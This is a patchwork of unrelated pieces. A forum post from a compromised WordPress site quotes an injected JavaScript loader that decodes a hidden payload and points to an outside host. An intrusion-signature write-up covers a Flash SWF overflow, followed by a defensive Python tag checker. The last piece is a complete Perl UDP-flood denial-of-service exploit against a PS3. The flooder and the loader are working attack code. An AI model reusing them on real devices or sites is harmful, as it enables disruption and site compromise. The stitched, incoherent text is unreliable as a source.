That means nothing at all to me. Here's the full .js file, with the "var str" bit removed, given it's shown above:

function Decode()
{
var temp="",i,c=0,out="";
var str="118#97#114#32#etc as decoded above...;
l=str.length;
while(c<=str.length-1)
{
while(str.charAt(c)!='#')
temp=temp+str.charAt(c++);
c++;
out=out+String.fromCharCode(temp);
temp="";
}
document.write(out);
}
function r(keyw, cat, lang)
{
document.write("<script language='javascript'>");
document.write("var fid='http://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"'; var lang='"+lang+"'; var subacc='"+cat+"';");
Decode();
document.write("<\/script>");
}

In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:

<a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>

I'm not sure if the Javascript works (somehow?) with that last URL, but that's all that's in each file (I'll gladly send anyone the folder if you want to take a look at the whole thing). I also Googled on one of the less-commonly-named files, and found that my site is not alone. As you can see there, a number of WordPress sites contain the "1" folder and associated HTML files.

My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins -- and that's where my suspicions lie for the most likely culprit. However, I don't have any idea how to go about figuring out how someone got in ... nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I'd welcome it!

HTTP Adobe SWF Remote Code Execution



Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description:
This signature detects an attempt to exploit a vulnerability in Adobe Flash Player which may result in remote code execution.

Additional Information:
Adobe Flash Player is an application for playing Flash media files.

Flash Player is prone to a remote buffer-overflow vulnerability when processing SWF files with the 'DefineSceneAndFrameLabelData' tag (tag ID 0x56). The issue stems from an integer overflow when calculating pointers. Attackers can use this issue to write to arbitrary memory locations.

An attacker can exploit the issue by enticing an unsuspecting victim to open a specially crafted multimedia file with the vulnerable application.

Successful exploits will allow the attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

Adobe Flash Player 9.0.115.0 and earlier versions are affected.

NOTE: This issue has been fixed in all versions of Adobe Flash Player 9.0.124.0.

Initial investigations suggested that the vulnerability had not been patched in the standalone Adobe Flash Player version 9.0.124.0 for Linux and the standalone Adobe Flash Player version 9.0.124.0 with debug capabilities for Microsoft Windows. The observed behavior that led to this initial conclusion has since been confirmed by Adobe as intended by design.

Affected:
Turbolinux wizpy
Turbolinux FUJI
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP1
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
S.u.S.E. Novell Linux Desktop 9
S.u.S.E. Linux 10.1 x86-64
S.u.S.E. Linux 10.1 x86
S.u.S.E. Linux 10.1 ppc
RedHat Enterprise Linux Supplementary 5 server
RedHat Enterprise Linux Extras 4
RedHat Enterprise Linux Extras 3
RedHat Enterprise Linux Desktop Supplementary 5 client
Gentoo Linux
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.5
Adobe Flex 3.0
Adobe Flash Professional 8
Adobe Flash Player Plugin 9.0.31.0
Adobe Flash Player Plugin 9.0.28.0
Adobe Flash Player Plugin 9.0.20.0
Adobe Flash Player Plugin 9.0.16
Adobe Flash Player Plugin 8.0
Adobe Flash Player Plugin 9.0.18d60
Adobe Flash Player 9.0.48.0
Adobe Flash Player 9.0.47.0
Adobe Flash Player 9.0.45.0
Adobe Flash Player 9.0.31.0
Adobe Flash Player 9.0.28.0
Adobe Flash Player 9.0.115.0
Adobe Flash Player 9
Adobe Flash Player 8.0.35.0
Adobe Flash Player 8.0.34.0
Adobe Flash CS3 Professional 0
Adobe Flash Basic 8
Adobe AIR 1.0

Response:
The vendor released Flash Player 9.0.124.0 to address this issue. Please see the references for more information.

Possible False Positives:
There are no known false positives associated with this signature.

Additional References:
CVE-2007-0071
SecurityFocus BID: 28695
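A content-inspection check for the tag the signature describes, added here and not part of the vendor text: it walks an uncompressed SWF tag stream, reads the SceneCount of each DefineSceneAndFrameLabelData tag (ID 0x56) as an EncodedU32, and flags a count that cannot possibly fit in the bytes that follow, which is the malformed input behind the pointer-arithmetic overflow. The record-header and EncodedU32 layouts are the standard SWF ones; the two sample tags are constructed.

```python
import struct

DEFINE_SCENE_AND_FRAME_LABEL_DATA = 0x56   # tag ID named in the signature text


def read_encoded_u32(buf, pos):
    """Decode an SWF EncodedU32: 7-bit groups, least significant first, at most 5 bytes.
    Returns (value, position after the field)."""
    value = 0
    for i in range(5):
        if pos >= len(buf):
            raise ValueError("truncated EncodedU32")
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << (7 * i)
        if not b & 0x80:
            break
    return value, pos


def iter_tags(stream):
    """Yield (tag code, tag body) from an uncompressed SWF tag stream (file header removed).
    A record header is a little-endian u16: code in the top 10 bits, length in the low 6;
    length 0x3F means a u32 length follows."""
    pos = 0
    while pos + 2 <= len(stream):
        (code_and_len,) = struct.unpack_from("<H", stream, pos)
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:
            (length,) = struct.unpack_from("<I", stream, pos)
            pos += 4
        yield code, stream[pos:pos + length]
        pos += length
        if code == 0:          # End tag
            break


def check_scene_tag(body):
    """Return (ok, reason) for one DefineSceneAndFrameLabelData body.

    SceneCount is bounded by the bytes that follow it: every scene record needs at
    least a 1-byte offset and a 1-byte NUL for an empty name. A count that cannot fit
    is the malformed case the signature above describes, where SceneCount feeds the
    pointer arithmetic that overflows (CVE-2007-0071).
    """
    try:
        scene_count, pos = read_encoded_u32(body, 0)
    except ValueError as exc:
        return False, str(exc)
    remaining = len(body) - pos
    if scene_count > remaining // 2:
        return False, "SceneCount %d cannot fit in %d remaining bytes" % (scene_count, remaining)
    return True, "SceneCount %d" % scene_count


def scan_swf_tags(stream):
    """Run check_scene_tag over every scene tag in the stream; findings in stream order."""
    return [check_scene_tag(body) for code, body in iter_tags(stream)
            if code == DEFINE_SCENE_AND_FRAME_LABEL_DATA]


def make_tag(code, body):
    """Build a tag record (short or long form); used only to construct the samples."""
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<H", (code << 6) | 0x3F) + struct.pack("<I", len(body)) + body


# Constructed samples: one scene named "main" with no frame labels, and a body that
# claims 0xFFFFFFFF scenes (EncodedU32 ff ff ff ff 0f) followed by four bytes.
BENIGN_TAG = make_tag(DEFINE_SCENE_AND_FRAME_LABEL_DATA, b"\x01" + b"\x00main\x00" + b"\x00")
HOSTILE_TAG = make_tag(DEFINE_SCENE_AND_FRAME_LABEL_DATA, b"\xff\xff\xff\xff\x0f" + b"\x00" * 4)
END_TAG = make_tag(0, b"")

if __name__ == "__main__":
    for ok, reason in scan_swf_tags(BENIGN_TAG + HOSTILE_TAG + END_TAG):
        print("OK " if ok else "BAD", reason)
```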

Tuesday, 3 January 2012

Playstation 3 "Remote Play" Remote DoS Exploit



Mar 26 2007 05:24AM
mak0b inbox com

#!/usr/bin/perl
####.:Playstation 3 "Remote Play" Remote DoS Exploit:.###
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K (mak0b[AT]inbox.com)
#
# POC code is based on odix's perl udp flooder
#########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl \n";
exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}